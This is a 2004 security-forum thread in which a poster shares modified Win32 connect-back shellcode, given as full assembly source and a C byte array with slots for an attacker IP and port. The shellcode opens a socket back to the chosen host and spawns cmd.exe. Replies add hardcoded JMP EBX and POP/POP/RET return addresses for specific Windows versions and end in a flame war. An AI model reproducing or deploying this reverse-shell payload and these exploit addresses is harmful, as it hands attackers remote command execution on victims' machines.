hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Windows Systems
101
Dec 27 2004, 11:42 AM
Tested working on:
Win2k SP4 Server
Win2k SP4 Pro.
WinXP SP1 Pro.
WinXP SP1a Pro.
WinXP SP2 Pro.
and more prolly!

This nice peace of code for coders restricted in space smile.gif , by brett moore and some small modifications by me to make it stable accross windows platforms.
Originally modded for the netcat exploit
{
QUOTE(101)
QUOTE(Anarchiste)

W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again

That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) .

Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore !

}
, it will be prolly used in some more exploits,
enjoy wink.gif

bmoore.asm
CODE

;*********************************** Christmas Shells***************************************
; Callback Shell.
; Directly set std handles and call system()
;
; 220 (DCh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 bmoore.asm
; tlink32 -Tpe -c -x bmoore.obj ,,, import32
;
;*********************************** Christmas Shells***************************************
; Jimminy jellicas its been jimplemented.
;  Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
;  All the o/s peeps who know whats what.
;*******************************************************************************
*************
;//bmoore
;
; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.
;//class101
.586p
locals

.model flat, stdcall
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC

.data
wsadescription_len equ 256
wsasys_status_len equ 128

WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends

wsadata WSAdata <?>

.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:

push    offset wsadata
push    0101h
call    WSAStartup
or      eax, eax
jz      winsock_found
jmp     codeend

winsock_found:

mov ebx,offset realstart
sub esp,400h
mov eax,esp

Copyit:

mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit
jmp esp

;****************************************************************************
; This is the start of the shell code
;****************************************************************************

realstart:

jmp over_data
sockdat db 02h,01h,00h,065h
        db 07fh,00h,00h,01h

hashes db 01h
dw 364Ah
db "MSVCRT",01
dw 422Ah
dw 8AD4h
db "WS2_32",01
dw 817Ch
dw 4E2Ch

over_data:

   push 0ACC3575Fh
call esp
mov  esi,7ffdf00ch
lodsd
push  dword ptr [esi]
mov  esi,[eax + 1ch]
lodsd
mov  edx,[eax + 08h]
push -8
lea ebx,[edi-8]

LookupFunctions:

push  esp
pop  ebp
mov ecx,dword ptr [edx + 3ch]
mov  esi,dword ptr [ecx + edx + 78h]
lea  esi,dword ptr [esi + edx + 1ch]
mov  cl,3

StoreAddress:

   lodsd
add  eax,edx
push  eax
loop  short StoreAddress

SearchStart:

dec  ebx
mov  esi,dword ptr [ebp - 8]
xor  eax,eax
push  eax

Search:

push  eax
   lodsd
   add  eax,edx
xor  ecx,ecx

hashy:

add  cx,word ptr [eax]
add  cl,byte ptr [eax]
inc  eax
cmp  byte ptr [eax],01
jge  hashy
pop  eax
inc  eax
cmp  cx,[ebx]
jne  Search
pop  esi
xchg  esi,eax
dec  esi
shl     esi,1
   add     esi,dword ptr [ebp - 0ch]
   lodsw
   shl     eax,2
   add     eax,dword ptr [ebp - 4h]
xchg  esi,eax
lodsd
   add     eax,edx
stosd
dec  ebx
cmp  byte ptr [ebx],01h
jne short SearchStart
leave
dec  byte ptr [ebx]
sub  ebx,06h
;//bmoore
cmp  byte ptr [ebx-1],01h
je  short Done_Finding
;//class101
push  ebx
call  dword ptr [edi + ebp]
xchg  edx,eax
push  -16
dec  ebx
jne  short LookupFunctions
;//bmoore
nop
nop
nop
nop
nop
nop
;//class101
Done_Finding:

xchg  eax,ebp
call  [EDI - 10h]
xor  ecx,ecx
push ecx
push ecx
push ecx
push ecx
inc  ecx
push ecx
inc  ecx
push  ecx
call [EDI - 08h]
xchg  ecx,edi
pop  edi
add  edi,18h
stosd
stosd
stosd
dec ebx
dec byte ptr [ebx]
dec ebx
push ebx
push ebx
push   eax
call [ecx - 0ch]
mov eax,1656E64h
sub eax,01010101h
push eax
push esp
call ebp
nop
call    WSACleanup

codeend:

   end     start
;//bmoore
---------EOF


C Format
CODE

char scode[] =
"\xEB\x21\x02\x01"
"\x00\x00" //port
"\x00\x00\x00\x00"  //ip
"\x01\x4A\x36\x4D\x53\x56"
"\x43\x52\x54\x01\x2A\x42\xD4\x8A\x57\x53\x32\x5F\x33\x32\x01\x7C"
"\x81\x2C\x4E\x68\x5F\x57\xC3\xAC\xFF\xD4\xBE\x0C\xF0\xFD\x7F\xAD"
"\xFF\x36\x8B\x70\x1C\xAD\x8B\x50\x08\x6A\xF8\x8D\x5F\xF8\x54\x5D"
"\x8B\x4A\x3C\x8B\x74\x11\x78\x8D\x74\x16\x1C\xB1\x03\xAD\x03\xC2"
"\x50\xE2\xFA\x4B\x8B\x75\xF8\x33\xC0\x50\x50\xAD\x03\xC2\x33\xC9"
"\x66\x03\x08\x02\x08\x40\x80\x38\x01\x7D\xF5\x58\x40\x66\x3B\x0B"
"\x75\xE8\x5E\x96\x4E\xD1\xE6\x03\x75\xF4\x66\xAD\xC1\xE0\x02\x03"
"\x45\xFC\x96\xAD\x03\xC2\xAB\x4B\x80\x3B\x01\x75\xC6\xC9\xFE\x0B"
"\x83\xEB\x06\x80\x7B\xFF\x01\x74\x10\x53\xFF\x14\x2F\x92\x6A\xF0"
"\x4B\x75\x9B\x90\x90\x90\x90\x90\x90\x95\xFF\x57\xF0\x33\xC9\x51"
"\x51\x51\x51\x41\x51\x41\x51\xFF\x57\xF8\x87\xCF\x5F\x83\xC7\x18"
"\xAB\xAB\xAB\x4B\xFE\x0B\x4B\x53\x53\x50\xFF\x51\xF4\xB8\x64\x6E"
"\x65\x01\x2D\x01\x01\x01\x01\x50\x54\xFF\xD5\x90";


enjoy!
extreme
Dec 27 2004, 12:08 PM
You are a pro.. Thank you for this usefull tool...
Maybe next time, you could make some kind of HTTP download shell, which would be small, stable, and wouldn't create files on desktop, like shellcode from JPEG exploit does...
Anarchiste
Dec 27 2004, 12:11 PM
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
BuzzDee
Dec 27 2004, 12:20 PM
gr8 work 101!


to anarchiste:
this should answer ur question:

CODE
char jmpebx[]="\x73\x1c\x57\x7c"; file://JMP EBX - kernel32.dll - Win2k SP4 Server,Pro English
char popopret[]="\xb1\x2c\xc2\x77"; file://POP,POP,RET - msvcrt.dll - WinXP SP2,SP1a,SP1 Pro English - I finally found out XP exploitation;<


greetz
101
Dec 27 2004, 12:34 PM
QUOTE(Anarchiste @ Dec 27 2004, 12:11 PM)
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
*



That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) .

Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore ! smile.gif

nb: sorry for my crap english , i know tongue.gif
Anarchiste
Dec 28 2004, 12:26 PM
QUOTE(BuzzDee @ Dec 27 2004, 12:20 PM)
to anarchiste:
this should answer ur question:

CODE
char jmpebx[]="\x73\x1c\x57\x7c"; file://JMP EBX - kernel32.dll - Win2k SP4 Server,Pro English
char popopret[]="\xb1\x2c\xc2\x77"; file://POP,POP,RET - msvcrt.dll - WinXP SP2,SP1a,SP1 Pro English - I finally found out XP exploitation;<


greetz
*



My question was about the tech to find api adress needed, and not any exploit, your quote is about one special exploit, i know the tech to make an exploit universal, but there is different way for a shellcode to be universal, Brett Moore use loop scan, lsd use a different way, similar but different, basing on the pattern MZ, correct me if i'm wrong, but thw to reply wink.gif

QUOTE(101 @ Dec 27 2004, 12:34 PM)
QUOTE(Anarchiste @ Dec 27 2004, 12:11 PM)
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
*



That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) .

Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore ! smile.gif

nb: sorry for my crap english , i know tongue.gif
*



Yeah!Thx to Brett Moore!but thx you to for your interesting release, i don't use -e switch on netcat, i prefer code my tools, but i will take a look wink.gif ...sorry for my crap english too tongue.gif
101
Dec 28 2004, 01:42 PM
QUOTE(101)
QUOTE(Peter Winter-Smith)

Hi,

Also, 'cmd&', system() will execute cmd.exe, and will treat all following
the ampersand as a following set of commands, and ignore it while the
cmd.exe process exists :-)

-Peter

Yes you are right , end if I remember I already tested this way but its not
stable accross all windows platforms, its as the Brett Moore original post
with the char \x20, for example, if I test on win2k sp4 server it works
fine, XP works fine, but it fail on Win2k SP4 Professional edition.
You can test yourself I just made the tests several times smile.gif
The old way suggested is working on all OS mentionned , sure it takes 6
bytes more than your suggestion , but much stable wink.gif

Cheers and thanx anyway for notify me.


Thus to say you can of course use the first way suggested by Brett Moore
CODE

; Call system()
push  20646D63h ; Push cmd"\x20" on stack, null exists from above
push  esp   ; Location to cmd
call  ebp   ; Call system()


or Peter Winter-Smith
CODE

; Call system()
push  26646D63h ; Push cmd"\x26" on stack, null exists from above
push  esp   ; Location to cmd
call  ebp   ; Call system()


You can down to the shellcode to 214 bytes but it will fail on all Win2k Professional edition. Don't have found yet why , the old way suggested by brett moore is still better for me , 6 more bytes and much stable smile.gif
Anarchiste
Dec 30 2004, 11:29 AM
It's nice to know that, thx for info tongue.gif
guy12
Dec 30 2004, 01:58 PM
QUOTE
You are a pro.. Thank you for this usefull tool...


yes a pro in code ripping wink.gif

everywhere i read you lame postings, with 1 year old codes!
everybody knows this shellcode....so don't waste your time
101
Dec 30 2004, 02:27 PM
QUOTE(101)
I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list


Looks like guy12, you are a retarded wich dont know to read. I have already mentionned 10000x times this is Brett Moore shellcode.
Now I have a suggestion to you , take the shellcode from the mailing list , build the netcat exploit with (of course your own exploit), do all this working then we will speak, else you have successfully submitted a Poc on your stupidity there smile.gif

QUOTE(101)
I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port...


I guess so that you are a noob and you not tried the buggy shellcode into an exploit but only compiled into a win32 binary.
Sorry for owning you take it nicely smile.gif

Bye
guy12
Dec 30 2004, 03:31 PM

QUOTE
I guess so that you are a noob and you not tried the buggy shellcode into an exploit



what??

i think i waste my time with you ...

QUOTE
--------------------

Don't forget that netcat 1.10 is vulnerable hat-squad.com/en/000142.html
--------------------
Don't forget to use netcat v1.11 vulnwatch.org/netcat
--------------------
Realtime Security News from 27 websites, 47 rsslinks => #n3ws (EFnet)
--------------------


because you are too narcissistically........

why do you add such a signature ??
do you think is so hard to code a simple bof...

it is always the same overflow a seh/or ret

then jump to a j mp reg or pop pop reg to the shellcode

and ?? i and many people have written a few exploits ,too, but nobody adds a sig. under every post with " HEY I CAN CODE A SIMPLE POC" ...

maybe someday you grow up...you don't need to answer , it is ok .....
101
Dec 30 2004, 03:49 PM
I simply told you to post a code, you answer me the color of my hairs,
discussion closed for me .

Bye!!!
Anarchiste
Dec 30 2004, 04:17 PM
QUOTE(guy12 @ Dec 30 2004, 03:31 PM)
QUOTE
I guess so that you are a noob and you not tried the buggy shellcode into an exploit



what??

i think i waste my time with you ...

QUOTE
--------------------

Don't forget that netcat 1.10 is vulnerable hat-squad.com/en/000142.html
--------------------
Don't forget to use netcat v1.11 vulnwatch.org/netcat
--------------------
Realtime Security News from 27 websites, 47 rsslinks => #n3ws (EFnet)
--------------------


because you are too narcissistically........

why do you add such a signature ??
do you think is so hard to code a simple bof...

it is always the same overflow a seh/or ret

then jump to a j mp reg or pop pop reg to the shellcode

and ?? i and many people have written a few exploits ,too, but nobody adds a sig. under every post with " HEY I CAN CODE A SIMPLE POC" ...

maybe someday you grow up...you don't need to answer , it is ok .....
*



Encore un qui a fait une overdose de buche glacée...

101 share his knowledge, apparently you are not for full disclosure, its your right, but i think someone must be reward for his work, so if you open the discussion, give us an exemple of your skills, or shut your mouse(i don't want be censured tongue.gif ), maybe you are an elite, so this forum isn't interesting for you apparently.
Have a nice day, 31337 (Wah0o! i saw an elite!! damn!I have an orgasm!)
u533m3n0t
Dec 30 2004, 04:23 PM
Guy12,
Didn't your mother teach you that if you don't have anything constructive or nice to say then don't say it? It's very easy to criticize. Takes effort to improve things or contribute. I hope that you are able to find that within you which is so weak you need to flame others to make yourself feel better. Good luck.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.